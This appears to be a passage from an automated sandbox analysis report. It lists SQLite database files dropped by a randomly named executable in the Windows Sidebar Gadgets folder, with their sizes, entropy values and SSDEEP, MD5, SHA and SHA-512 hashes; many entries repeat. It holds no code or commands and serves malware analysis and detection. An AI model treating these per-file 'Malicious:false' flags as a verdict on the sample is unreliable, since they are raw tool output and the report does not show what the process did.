                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                  Encrypted:false
